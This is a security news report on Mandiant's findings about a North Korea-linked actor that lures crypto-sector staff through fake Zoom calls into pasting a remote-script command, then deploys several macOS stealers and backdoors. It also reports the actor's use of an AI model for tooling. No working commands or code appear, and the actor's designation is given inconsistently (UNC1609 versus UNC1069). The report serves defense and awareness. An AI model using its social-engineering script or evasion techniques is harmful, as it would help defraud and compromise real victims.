A financially motivated threat actor tracked as UNC1609 is using a ClickFix-style social engineering campaign to deploy multiple macOS malware families against crypto-focused organizations.
According to new research from Google Cloud’s Mandiant, the activity recently targeted an employee at a company operating in the cryptocurrency and decentralized finance (DeFi) sector. The researchers said that the North Korea-linked UNC1069 used a social engineering chain that involved a hijacked Telegram account, a fake Zoom meeting, a ClickFix-style command execution, and the reported use of AI-generated video to deceive the victim.
By impersonating a known industry contact and staging a fake video meeting, the threat actor convinced the victim to execute malicious terminal commands on a macOS system manually.
ClickFix as initial access
The attack began with the victim being contacted via Telegram from a compromised account belonging to a legitimate industry executive. After establishing credibility, the attacker invited the target to a video meeting hosted on infrastructure controlled by the threat actor.
During the meeting, the victim reportedly saw what appeared to be a recognizable individual from the cryptocurrency industry. Researchers assessed that the video may have been artificially generated or manipulated to reinforce legitimacy. Shortly after the call began, the attacker claimed there were audio issues and instructed the victim to perform troubleshooting steps.
These steps included copying and pasting commands into the macOS Terminal. One command used “curl” piped into “zsh”, effectively downloading and executing a remote script. That action initiated the infection chain.
Mandiant said it observed similar tactics outside of this attack. “The recovered web page provided two sets of commands to be run for “troubleshooting”: one for macOS systems, and one for Windows systems,” the researchers noted. “Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives.”
UNC1069 is known to use tools like Google Gemini to develop tooling, conduct operational research, and assist during reconnaissance stages, they added.
Use of specialized, undocumented macOS malware
After the ClickFix-triggered access is established, UNC1069 deployed a multi-stage macOS malware stack that Mandiant identified as including WAVESHAPER, HYPERCALL, HIDDENCALL, DEEPBREATH, and CHROMEPUSH, among others. Several of these malware families had not been documented publicly before Mandiant’s disclosure.
WAVESHAPER functioned as the primary backdoor, establishing remote access and enabling additional payload delivery. HYPERCALL operated as a downloader, retrieving secondary components such as HIDDENCALL, which provided further command execution capabilities. This staged deployment allowed the threat actor to expand control over the compromised macOS system in phases rather than dropping a single large payload.
DEEPBREATH, a Swift-based infostealer, focused on harvesting sensitive data from the host. According to the researchers, it manipulated Apple’s Transparency, Consent, and Control (TCC) framework to access protected resources without prompting the user. That enabled the collection of browser data, keychain material, and messaging content. CHROMEPUSH, meanwhile, targeted browser environments, including session cookies and authentication tokens.
The researchers also observed abuse of macOS security mechanisms, including functionalities on Apple’s XProtect system. Instead of disabling protections right away, the malware leveraged trusted system components and expected behaviors to reduce detection visibility.
Mandiant stated that the use of a custom, integrated tool suite indicated UNC1069’s technical proficiency in specialized capabilities and security bypass. It provided a list of network-based and host-based indicators of compromises (IOCs) to support detection efforts. Additionally, the disclosure included a set of YARA rules that are also supported in Google SecOps.